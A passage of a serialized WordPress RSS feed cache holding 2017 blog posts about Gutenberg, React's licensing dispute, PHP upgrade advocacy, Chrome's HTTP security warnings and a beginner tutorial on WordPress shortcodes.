WordPress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:58:"https://wptavern.com?p=74359&preview=true&preview_id=74359";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:95:"https://wptavern.com/morten-rand-hendriksen-on-what-gutenberg-means-for-the-future-of-wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2507:"<p>As work continues on <a href="https://wordpress.org/plugins/gutenberg/">Gutenberg</a>, members of the community are discussing its impacts on WordPress&#8217; future. Morten Rand-Hendriksen <a href="https://www.linkedin.com/pulse/gutenberg-morten-rand-hendriksen">considers Gutenberg</a> to be a watershed moment, &#8220;This is a revolution,&#8221; he said.</p>\n<p>&#8220;This is a watershed moment for WordPress. This is entirely new and fundamentally different from how WordPress works and how we work with it today. I cannot overstate it enough when I say this changes everything.&#8221;</p>\n<p>Rand-Hendriksen suggests that Gutenberg will allow WordPress to graduate from being a blogging platform to a platform for managing views. If Gutenberg adds complexity to the user interface, he predicts many users will migrate to simpler, hosted publishing systems.</p>\n<p>He also predicts that due to the REST API and Gutenberg, permanent fractures may develop between different segments of the community and user base.</p>\n<p>It&#8217;s exciting to think about what could happen to WordPress and the web in general if Rand-Hendriksen&#8217;s optimism comes to fruition. &#8220;Whatever happens to WordPress’ user base, once Gutenberg is implemented fully, WordPress’ role in the wider web and internet community will change,&#8221; he said.</p>\n<p>&#8220;If all these things actually work, and people find them useful, WordPress will herald in a new age of UI and UX exploration. Applications have followed WordPress’ lead before and will do it again if the new solution works.&#8221;</p>\n<p>As for the future of WordPress, Rand-Hendriksen says:</p>\n<blockquote class="wp-block-quote blocks-quote-style-1"><p>With the REST API in core and Gutenberg on the horizon, I am starting to see a new future for WordPress, one that looks nothing like where we are today. But this is true for the web as a whole as well.</p>\n<p>Non-pointer interactions, AR/VR/MR, AI, content beyond the screen, all these things are already within sight and the web as we know it is on the cusp of its own wave of revolutionary changes.</p>\n<p>The question I’m left to ponder is whether Gutenberg is what brings WordPress into that future.</p></blockquote>\n<p>I encourage you to <a href="https://www.linkedin.com/pulse/gutenberg-morten-rand-hendriksen">read the entire post</a> as it provides a lot of food for thought. What do you think about his predictions and the impacts Gutenberg might have on the web as a whole?</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Tue, 22 Aug 2017 01:41:06 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Jeff Chandler";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:1;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:69:"WPTavern: Facebook Isn’t Budging on React’s BSD + Patents License";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=74333";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:72:"https://wptavern.com/facebook-isnt-budging-on-reacts-bsd-patents-license";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:7456:"<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2015/12/react.png?ssl=1"><img /></a></p>\n<p>Last month <a href="https://wptavern.com/react-users-petition-facebook-to-re-license-react-js-after-apache-software-foundation-bans-bsdpatents-license-in-dependencies" target="_blank">React users petitioned Facebook to relicense the project</a> (and its other open source projects) after the Apache Software Foundation (ASF) added Facebook’s BSD+Patents license to its <a href="https://www.apache.org/legal/resolved#category-x" target="_blank">Category X list of disallowed licenses</a> for Apache PMC members. Participants and subscribers to the <a href="https://github.com/facebook/react/issues/10191" target="_blank">GitHub thread</a> waited weeks for a decision on re-licensing while Facebook&#8217;s engineering directors discussed the matter internally. The request has now formally been <a href="https://code.facebook.com/posts/112130496157735/explaining-react-s-license/" target="_blank">denied</a>.</p>\n<p>&#8220;I&#8217;d like to apologize for the amount of thrash, confusion, and uncertainty this has caused the React and open source communities,&#8221; Facebook engineer Adam Wolff said. &#8220;We know this is painful, especially for teams that feel like they&#8217;re going to need to rewrite large parts of their project to remove React or other dependencies. We&#8217;ve been looking for ways around this and have reached out to ASF to see if we could try to work with them, but have come up empty.&#8221;</p>\n<p>The request for re-licensing had received 851 &#8220;thumbs-up&#8221; reactions on GitHub and many developers commented to say that the ASF&#8217;s policy disallowing the BSD+Patents license <a href="https://wptavern.com/petition-to-re-license-react-has-been-escalated-to-facebooks-engineering-directors" target="_blank">affects their organizations&#8217; ability to continue using React</a> and other open source projects from Facebook. Others said they would like to use React but the licensing makes it impossible for their companies.</p>\n<h3>Facebook Cites &#8220;Meritless Patent Litigation&#8221; as the Reason Behind Adopting the BSD + Patents License</h3>\n<p>Wolff&#8217;s <a href="https://code.facebook.com/posts/112130496157735/explaining-react-s-license/" target="_blank">post</a> announcing Facebook&#8217;s decision said that the team has not done a good job of communicating the reasons behind its BSD + Patents license and offered a more in-depth explanation:</p>\n<blockquote><p>As our business has become successful, we&#8217;ve become a larger target for meritless patent litigation. This type of litigation can be extremely costly in terms of both resources and attention. It would have been easy for us to stop contributing to open source, or to do what some other large companies do and only release software that isn&#8217;t used in our most successful products, but we decided to take a different approach. We decided to add a clear patent grant when we release software under the 3-clause BSD license, creating what has come to be known as the BSD + Patents license. The patent grant says that if you&#8217;re going to use the software we&#8217;ve released under it, you lose the patent license from us if you sue us for patent infringement. We believe that if this license were widely adopted, it could actually reduce meritless litigation for all adopters, and we want to work with others to explore this possibility.</p></blockquote>\n<p>The ASF&#8217;s decision to disallow the BSD+Patents license was for policy reasons, not a legal decision based on incompatibility. Greg Stein, commenting on behalf of ASF on a separate GitHub issue, <a href="https://github.com/omcljs/om/issues/882" target="_blank">said</a> that the ASF didn&#8217;t want downstream users of Apache code to be surprised by the PATENTS grant that was previously in RocksDB and is still in React. The organization wanted users to have no further constraints other than following the ALv2.</p>\n<p>&#8220;While we respect this decision, it hurts to see so many great ASF projects get churned for policy reasons after using this license for years,&#8221; Wolff said in Facebook&#8217;s announcement. The company made it clear that they will not be re-licensing React or any other projects simply to satisfy ASF&#8217;s policy requirements.</p>\n<p>&#8220;We have considered possible changes carefully, but we won&#8217;t be changing our default license or React&#8217;s license at this time,&#8221; Wolff said. &#8220;We recognize that we may lose some React community members because of this decision. We are sorry for that, but we need to balance our desire to participate in open source with our desire to protect ourselves from costly litigation. We think changing our approach would inhibit our ability to continue releasing meaningful open source software and increase the amount of time and money we have to spend fighting meritless lawsuits.&#8221;</p>\n<p>Many from the OSS community expressed disappointment and frustration in their initial reactions on Twitter:</p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">“People like to sue us,” is a poor rationalization. This is weaponizing OSS under the guise of sharing. The whole post is disingenuous.</p>\n<p>&mdash; Nicholas C. Zakas (@slicknet) <a href="https://twitter.com/slicknet/status/898732045442011136">August 19, 2017</a></p></blockquote>\n<p></p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">Facebook is often the ideal open source partner &#8211; but their patent stance here makes React use untenable to me. <a href="https://t.co/97VIR0le36">https://t.co/97VIR0le36</a></p>\n<p>&mdash; Adam Jacob (@adamhjk) <a href="https://twitter.com/adamhjk/status/898734487718121472">August 19, 2017</a></p></blockquote>\n<p></p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">The React license allows Facebook to violate patents of companies that use React, and those companies can\'t sue to stop Facebook</p>\n<p>&mdash; Feross (@feross) <a href="https://twitter.com/feross/status/898730336082776064">August 19, 2017</a></p></blockquote>\n<p></p>\n<blockquote class="twitter-tweet">\n<p lang="en" dir="ltr">Yep, my team\'s required to pull all use of React because of the license. It\'s a corporate wide issue.</p>\n<p>&mdash; Tyler Fitch (@tfitch) <a href="https://twitter.com/tfitch/status/898742063738494976">August 19, 2017</a></p></blockquote>\n<p></p>\n<p>The issue requesting re-licensing has been <a href="https://github.com/facebook/react/issues/10191#issuecomment-323486580" target="_blank">closed on GitHub</a> and is now locked and limited to collaborators.</p>\n<p>It&#8217;s not clear how this decision will affect WordPress, as the project has yet to announce which JS framework it will be adopting for core. Automattic is heavily invested in React, having built Calypso and Jetpack&#8217;s admin interface with it. WordPress&#8217; new Gutenberg editor is also built using React, as the project&#8217;s chief contributors are employed by Automattic. The company&#8217;s legal counsel has said in the past that they are <a href="https://wptavern.com/automattic-will-continue-to-use-react-js-in-calypso-despite-patent-clause" target="_blank">comfortable using React for its products under the current license</a>, but other companies in the WordPress ecosystem may not be as amenable to having the framework included in core.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Sat, 19 Aug 2017 03:52:50 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:2;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:84:"WPTavern: WordPress.org to Add New Page Educating Users on Benefits of Upgrading PHP";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=74303";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:95:"https://wptavern.com/wordpress-org-to-add-new-page-educating-users-on-benefits-of-upgrading-php";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:3456:"<p>WordPress&#8217; Core PHP team has created a new <a href="https://github.com/wp-core-php" target="_blank">GitHub organization</a> for initiatives focused on improving the use of PHP in the project. The first one they are tackling is <a href="https://github.com/wp-core-php/servehappy/" target="_blank">a new page on WordPress.org</a> dedicated to educating users about the benefits of upgrading PHP. Contributors are <a href="https://github.com/wp-core-php/servehappy-resources" target="_blank">collecting third-party articles and tutorials on PHP upgrades</a> to find inspiration for the project, which is temporarily codenamed &#8220;servehappy.&#8221;</p>\n<p>WordPress&#8217; <a href="https://wordpress.org/about/stats/" target="_blank">stats</a> page shows that 14.2% of the all the sites it is tracking are running on PHP 7.0+. 40.6% of sites are on PHP 5.6, which is no longer actively supported but will receive security fixes until January 2019. This leaves 45.2% of all WordPress sites running on older, insecure PHP versions that have already reached end of life and are no longer receiving security updates.</p>\n<a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2017/08/wp-php-versions-8-18-2017.png?ssl=1"><img /></a>WordPress PHP Versions &#8211; 8.18.2017\n<p>Contributors are using the <a href="https://github.com/wp-core-php/servehappy/issues" target="_blank">issues queue of the servehappy repository</a> to collect benefits and statistical data they can use to sell the &#8220;update PHP&#8221; proposition to users. The project is currently in the brainstorming phase, but the team will eventually whittle the ideas down to present the most effective benefits.</p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2017/08/servehappy-issues-e1503086149333.png?ssl=1"><img /></a></p>\n<p>&#8220;The primary task for the &#8216;servehappy&#8217; repository will be to open issues for the benefits we’ve come up with over the past few weeks, and discuss them one by one, whether they qualify for the page and how they can be framed in the most convincing way,&#8221; Felix Arntz said.</p>\n<p>In addition to proposing the benefits of upgrading PHP, the page will also include a call to action and information about how to upgrade or how to approach your host for an upgrade. Contributors are discussing the page&#8217;s outline and are aiming to tackle the project in a friendly and sensitive way that doesn&#8217;t put stress on users.</p>\n<p>&#8220;The section &#8216;<em>What should you need to know before doing an update?</em>&#8216; must not unnecessarily make the user worry,&#8221; Arntz said, recapping the thoughts contributors expressed during the team&#8217;s most recent meeting. &#8220;Let’s highlight possible issues, but not overestimate them. People should see upgrading as a good thing, and we should point them to how they can determine whether their sites are ready.&#8221;</p>\n<p>The Core PHP Team will be getting in touch with WordPress&#8217; marketing team to request their expertise on refining the page&#8217;s approach. Anyone is welcome to contribute third-party resources or ideas to the <a href="https://github.com/wp-core-php/servehappy" target="_blank">servehappy project on GitHub</a>. Check out the most recent <a href="https://make.wordpress.org/core/2017/08/17/php-meeting-recap-august-14th/" target="_blank">meeting notes</a> for a full summary of the project and its needs.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 18 Aug 2017 20:37:06 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:3;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:92:"WPTavern: Chrome Version 62 to Show Security Warnings on HTTP Pages Starting in October 2017";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:29:"https://wptavern.com/?p=74301";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:103:"https://wptavern.com/chrome-version-62-to-show-security-warnings-on-http-pages-starting-in-october-2017";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:2444:"<p>Google Search Console has started sending out notices to sites that have not yet migrated to HTTPS. Chrome 61 is now in beta and version 62 is on track to begin marking HTTP pages as &#8220;NOT SECURE&#8221; beginning in October. It will show the warning if it detects any forms on the page that transmit passwords, credit cards, or any text input fields that the browser deems are in need of HTTPS protection. All HTTP pages in incognito mode will trigger the warning.</p>\n<p><a href="https://i2.wp.com/wptavern.com/wp-content/uploads/2017/08/chrome-warning.png?ssl=1"><img /></a></p>\n<p>In January 2017, Chrome version 56 began marking sites that transmit passwords or credit cards as non-secure as part of its long-term plan to mark all HTTP sites as non-secure. The warning will become more prominent as time goes on.</p>\n<p>&#8220;Eventually, we plan to label all HTTP pages as non-secure, and change the HTTP security indicator to the red triangle that we use for broken HTTPS,&#8221; Chrome Security Team Emily Schechter said.</p>\n<p><a href="https://i1.wp.com/wptavern.com/wp-content/uploads/2017/08/eventual-chrome-warning-for-http-pages.png?ssl=1"><img /></a></p>\n<p>The email sent out from the Google Search Console urges site owners to fix the problem by <a href="https://support.google.com/webmasters/answer/6073543?utm_source=wnc_10038795&utm_medium=gamma&utm_campaign=wnc_10038795&utm_content=msg_100078324&hl=en" target="_blank">migrating to HTTPS</a>. Hosting companies that specialize in WordPress are making it easier than ever to make the switch. Many of them have added Let’s Encrypt integration to offer free certificates to customers. As of 2017, WordPress now only recommends <a href="https://wptavern.com/wordpress-will-only-recommend-hosting-companies-offering-ssl-by-default-in-2017" target="_blank">hosting partners that provide SSL certificates by default</a>.</p>\n<p>Thanks to the push towards HTTPS from Google, web browsers, hosting companies, and the <a href="https://wptavern.com/lets-encrypt-passes-100-million-certificates-issued-will-offer-wildcard-certificates-in-january-2018" target="_blank">100+ million certificates issued by Let&#8217;s Encrypt</a>, the <a href="https://ipv.sx/telemetry/general-v2.html?channels=release&measure=HTTP_PAGELOAD_IS_SSL&target=1&absolute=0&relative=1" target="_blank">percentage of pageloads over HTTPS is now approaching 60%</a>, according to Firefox Telemetry.</p>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Fri, 18 Aug 2017 17:14:31 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:13:"Sarah Gooding";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:4;a:6:{s:4:"data";s:13:"\n	\n	\n	\n	\n	\n	\n";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:2:{s:0:"";a:5:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:43:"Lorelle on WP: WordPress School: Shortcodes";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:37:"http://lorelle.wordpress.com/?p=14325";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:69:"https://lorelle.wordpress.com/2017/08/18/wordpress-school-shortcodes/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:15281:"<p><a href="https://lorelle.wordpress.com/category/wordpress/wordpress-school/" title="WordPress School taught by Lorelle VanFossen."><img /></a></p>\n<p>WordPress shortcodes are abbreviated code placed into the WordPress Visual or Text Editors that expands into a larger code structure. As we continue with <a href="https://lorelle.wordpress.com/classes-and-workshops/wordpress-school/" title="WordPress School « Lorelle on WordPress">Lorelle&#8217;s WordPress School free online course</a>, it&#8217;s time to explore the basics of WordPress shortcodes.</p>\n<p>The following is the embed code for a Google Map, pointing to one of my favorite local museums, <a href="http://ricenorthwestmuseum.com/">The Rice Northwest Rocks and Minerals Museum</a> in Hillsboro, Oregon:</p>\n<p><code>&lt;a href="https&#058;&#047;&#047;www&#046;google.com/maps/embed?pb=!1m18!1m12!1m3!1d2792.809130780463!2d-122.94987648443889!3d45.57427677910247!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54950456e76e254b%3A0xdfad5d11bde5b6cc!2s26385+NW+Groveland+Dr%2C+Hillsboro%2C+OR+97124!5e0!3m2!1sen!2sus!4v1502560000052"&gt;https&#058;&#047;&#047;www&#046;google.com/maps/embed?pb=!1m18!1m12!1m3!1d2792.809130780463!2d-122.94987648443889!3d45.57427677910247!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54950456e76e254b%3A0xdfad5d11bde5b6cc!2s26385+NW+Groveland+Dr%2C+Hillsboro%2C+OR+97124!5e0!3m2!1sen!2sus!4v1502560000052&lt;/a&gt;</code></p>\n<p>When the post or Page is saved, WordPress.com automatically converts it to the embed code for Google Maps like this:</p>\n<p><code>&#091;googlemaps https&#058;&#047;&#047;www&#046;google&#046;com/maps/embed?pb=!1m18!1m12!1m3!1d2792.809130780463!2d-122.94987648443889!3d45.57427677910247!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54950456e76e254b%3A0xdfad5d11bde5b6cc!2s26385+NW+Groveland+Dr%2C+Hillsboro%2C+OR+97124!5e0!3m2!1sen!2sus!4v1502560000052&amp;w=600&amp;h=450]</code></p>\n<p>This is what you see in your Visual or Text/HTML editors. Doesn&#8217;t look like a map, yet, does it? </p>\n<p>When the post is previewed or published, you will see the map like this:</p>\n<div class="googlemaps"></div>\n<p>The map is not a screenshot. It is interactive. Zoom in and out and move around on the map. The <a href="https://en.support.wordpress.com/google-maps/" title="Google Maps — Support — WordPress.com">Google Maps shortcode</a> taps into the Google Maps API allowing a live section of the map to be embedded on your site to help people find locations and directions. </p>\n<p>Google Maps are a great way of providing instructions to the location of a store or company on a Contact web page. They are also fun to embed in a post about a favorite park, hike, fishing hole, vacation spot, or even create a custom map that charts your travels, hikes, or a specific route for shopping or exploring. </p>\n<p><strong>NOTE:</strong> <em>Google Map embeds are tricky. You need to search for the exact address and use that embed code. If you search for a business name, you may get an invalid server request from Google Maps. Also note that WordPress.com has made it easier to use shortcodes by skipping the extra code and converting links and embed codes automatically to shortcodes. This may require saving your post as a draft twice before you can see the results on the front end preview of the post or Page.</em></p>\n<p>Shortcodes allow the user to add content and functionality to a WordPress site without knowing extensive code or digging into the programming of a WordPress Theme or Plugin. With the shortcut of a shortcode, WordPress users may add all sorts of customization features to their site.</p>\n<p>There are a variety of shortcodes in the core of WordPress. WordPress Themes have the ability to enable or disable these, and add more, as do WordPress Plugins.</p>\n<p>Let&#8217;s experiment with the <a title="Archives Shortcode &mdash; Support &mdash; WordPress.com" href="http://en.support.wordpress.com/archives-shortcode/">Archives Shortcode</a>.</p>\n<ol>\n<li>Add a New Page to your site. Title it &#8220;Site Map&#8221; or &#8220;Archives.&#8221;</li>\n<li>Type in <code>&#091;archives]</code>.</li>\n<li>Preview, then publish the post when ready to see a listing of all of the published posts on your site in a list.</li>\n</ol>\n<p>Check out my <a href="https://lorelle.wordpress.com/site-map/" title="Site Map « Lorelle on WordPress">site map</a> as an example of what&#8217;s possible. </p>\n<h3>What You Need to Know About WordPress Shortcodes</h3>\n<p>Shortcodes come with WordPress out of the box, and also with WordPress Themes and Plugins. These snippets of code allow the user to add functionality to their site without touching the code. </p>\n<p>The PHP code that enables the functionality, and adds the ability to use the abbreviated code to generate that functionality on the site, is called a <code>function</code>. </p>\n<p>At its core, this is the function found to generate all WordPress Shortcodes:</p>\n<pre class="brush: xml; title: ; notranslate">//[foobar]\nfunction foobar_func( $atts ){\n	return "foo and bar";\n}\nadd_shortcode( \'foobar\', \'foobar_func\' );</pre>\n<p>The attributes, represented in this abbreviated version by <code>$atts</code>, are the instructions as to what the shortcode is to do.</p>\n<p>In the expanded form with functionality, I&#8217;ve called the shortcode &#8220;elephant&#8221; and set up two attribute values, &#8220;trumpet loudly&#8221; and &#8220;stomp.&#8221; </p>\n<pre class="brush: xml; title: ; notranslate">// [elephant foo="foo-value"]\nfunction elephant_func( $atts ) {\n    $a = shortcode_atts( array(\n        \'foo\' =&gt; \'trumpet loudly\',\n        \'bar\' =&gt; \'stomp\',\n    ), $atts );\n\n    return "foo = {$a[\'foo\']}";\n}\nadd_shortcode( \'elephant\', \'elephant_func\' );</pre>\n<p>Depending upon what &#8220;foo&#8221; and &#8220;bar&#8221; represent, the results would be &#8220;trumpet loudly&#8221; and &#8220;stomp.&#8221; What these represent are HTML code, modifications to HTML code, and initiates the programming such as generating a list of all the posts you&#8217;ve published as an archive list.</p>\n<p>Right now, you aren&#8217;t at the stage where you can program shortcodes and add them to WordPress Themes or create WordPress Plugins, so I&#8217;m not going to dive into these much deeper. You need to learn how these work and how to use them on your site, and the more you use them, the better feel you will have for what a shortcode can do on your site. </p>\n<p>WordPress.com offers a <a href="https://en.support.wordpress.com/category/shortcodes/" title="Support — WordPress.com">wide range of shortcodes</a> to add functionality to your site. To learn about how to use these, see <a title="Shortcodes &mdash; Support &mdash; WordPress.com" href="http://en.support.wordpress.com/shortcodes/">Shortcodes &mdash; Support</a>. </p>\n<p>Here are some examples of shortcodes to experiment with on WordPress.com.</p>\n<ul>\n<li><a href="https://en.support.wordpress.com/videos/youtube/" title="YouTube — Support — WordPress.com">YouTube Shortcode</a></li>\n<li><a href="https://en.support.wordpress.com/audio/" title="Audio — Support — WordPress.com">Audio Shortcode</a></li>\n<li><a href="https://en.support.wordpress.com/soundcloud-audio-player/">SoundCloud Audio Player Shortcode</a></li>\n<li><a href="https://en.support.wordpress.com/gallery/" title="Galleries and Slideshows — Support — WordPress.com">Galleries and Slideshows Shortcode</a></li>\n<li><a href="https://en.support.wordpress.com/instagram/" title="Instagram — Support — WordPress.com">Instagram Shortcode</a></li>\n<li><a href="https://en.support.wordpress.com/archives-shortcode/" title="Create an Archive using the Archives Shortcode — Support — WordPress.com">Archives Shortcode</a></li>\n<li><a href="https://en.support.wordpress.com/blog-subscription-shortcode/" title="Blog Subscription Shortcode — Support — WordPress.com">Blog Subscription Shortcode</a></li>\n<li><a href="https://en.support.wordpress.com/forms/contact-form/" title="Contact Form — Support — WordPress.com">Contact Form Shortcode</a></li>\n<li><a href="https://en.support.wordpress.com/google-maps/" title="Google Maps — Support — WordPress.com">Google Maps Shortcode</a></li>\n<li><a href="https://en.support.wordpress.com/recipes/" title="Recipes — Support — WordPress.com">Recipes Shortcode</a></li>\n</ul>\n<h4>More Information on WordPress Shortcodes</h4>\n<ul>\n<li><a title="Shortcodes &mdash; Support &mdash; WordPress.com" href="http://en.support.wordpress.com/shortcodes/">Shortcodes &#8211; Support &#8211; WordPress.com</a></li>\n<li><a title="Shortcodes &mdash; Support &mdash; WordPress.com" href="http://en.support.wordpress.com/shortcodes/">List of Shortcodes available for WordPress.com sites</a></li>\n<li><a title="Shortcode &laquo; WordPress Codex" href="http://codex.wordpress.org/Shortcode">Shortcode &#8211; WordPress Codex</a></li>\n<li><a title="Support &mdash; WordPress.com" href="http://en.support.wordpress.com/category/shortcodes/">Shortcodes for WordPress.com</a></li>\n<li><a title="Gallery Shortcode &laquo; WordPress Codex" href="http://codex.wordpress.org/Gallery_Shortcode">Gallery Shortcode &#8211; WordPress Codex</a></li>\n<li><a href="https://www.smashingmagazine.com/2012/05/wordpress-shortcodes-complete-guide/" title="WordPress Shortcodes: A Complete Guide – Smashing Magazine">WordPress Shortcodes: A Complete Guide – Smashing Magazine</a></li>\n<li><a href="http://www.wpbeginner.com/wp-tutorials/how-to-add-a-shortcode-in-wordpress/" title="How to Add A Shortcode in WordPress?">How to Add A Shortcode in WordPress? &#8211; WPBeginner</a></li>\n<li><a href="http://www.wpbeginner.com/beginners-guide/7-essential-tips-for-using-shortcodes-in-wordpress/" title="7 Essential Tips for Using Shortcodes in WordPress">7 Essential Tips for Using Shortcodes in WordPress &#8211; WPBeginner</a></li>\n<li><a href="https://code.tutsplus.com/articles/getting-started-with-wordpress-shortcodes--wp-21197" title="Getting Started With WordPress Shortcodes">Getting Started With WordPress Shortcodes &#8211; Envatotuts+</a></li>\n</ul>\n<h3>Assignment</h3>\n<p><img />Your assignment in these WordPress School exercises is to experiment with WordPress shortcodes, specifically the ones available on WordPress.com. </p>\n<p>I&#8217;ve listed some examples of shortcodes on WordPress.com above, and you may find more in the <a href="https://en.support.wordpress.com/category/shortcodes/" title="Support — WordPress.com">WordPress.com list of Shortcodes</a>.</p>\n<p>Your assignment is to use shortcodes to add features to your site. </p>\n<ul>\n<li>Create a Page called &#8220;Site Map&#8221; or &#8220;Archives&#8221; and add an archive list shortcode.</li>\n<li>Add a Google Map to a post or Page using the Google Maps shortcode.</li>\n<li>Add a gallery to a post or Page with the gallery shortcode, testing the various options (parameters) to get the look and feel you like best.</li>\n<li>Add a recipe to a post using the recipe shortcode.</li>\n<li>Find another shortcode with a variety of features to experiment with. See how many ways you can change the look and feel of the content. If you wish, blog about your discoveries with screenshots or examples in the post. Let us know about it in the comments below so we can come inspect your work.</li>\n</ul>\n<p><em>This is a tutorial from <a href="https://lorelle.wordpress.com/classes-and-workshops/wordpress-school/" title="WordPress School « Lorelle on WordPress">Lorelle&#8217;s WordPress School</a>. For more information, and to join this free, year-long, online WordPress School, see:</em></p>\n<ul>\n<li><a 